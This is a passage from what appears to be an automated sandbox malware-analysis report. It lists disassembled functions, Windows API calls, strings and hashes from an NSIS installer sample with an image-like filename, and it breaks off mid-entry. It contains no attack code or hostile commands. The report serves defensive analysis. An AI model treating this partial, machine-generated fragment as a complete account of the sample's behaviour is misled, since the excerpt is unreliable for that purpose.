                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                        • lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                        • lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,74DF23A0), ref: 0040542D
                                        • SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                        • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                        • Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                        • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                        Function 00404C80 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                        • GetMessagePos.USER32 ref: 00404CA3
                                        • ScreenToClient.USER32(?,?), ref: 00404CBD
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                        • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                        Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00402E90
                                        • wsprintfA.USER32 ref: 00402EA0
                                        • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E9A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                        • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                        Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                        • wsprintfA.USER32 ref: 00406697
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004066AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                        • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                        Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                        • GlobalFree.KERNEL32(?), ref: 004028C9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                        • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                        • Opcode Fuzzy Hash: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                        • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                        Function 00403168 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                        • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                        • Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                        • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                        Function 00406587 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                        • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                        • CharNextA.USER32(0000000C,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                        • CharPrevA.USER32(0000000C,0000000C,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                        • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                        Function 0040177E Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
                                        • CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID:
                                        • API String ID: 1941528284-0
                                        • Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                        • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                        • Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                        • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                        Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                        • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                        Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401DA3
                                        • GetClientRect.USER32(?,?), ref: 00401DF1
                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                        • DeleteObject.GDI32(00000000), ref: 00401E45
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                        • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                        Function 00401E5A Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E5D
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                        • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                        • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                        • Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                        • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                        Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                        • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                        Function 00404B76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                        • wsprintfA.USER32 ref: 00404C1C
                                        • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                        • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                        • Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                        • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                        Function 004020CA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020F5
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                        • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                        • Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                        • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                        Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                        • GetTickCount.KERNEL32 ref: 00402EFE
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                        • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                        • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                        Function 00405345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405374
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                          • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                        Strings
                                        Memory Dump Source
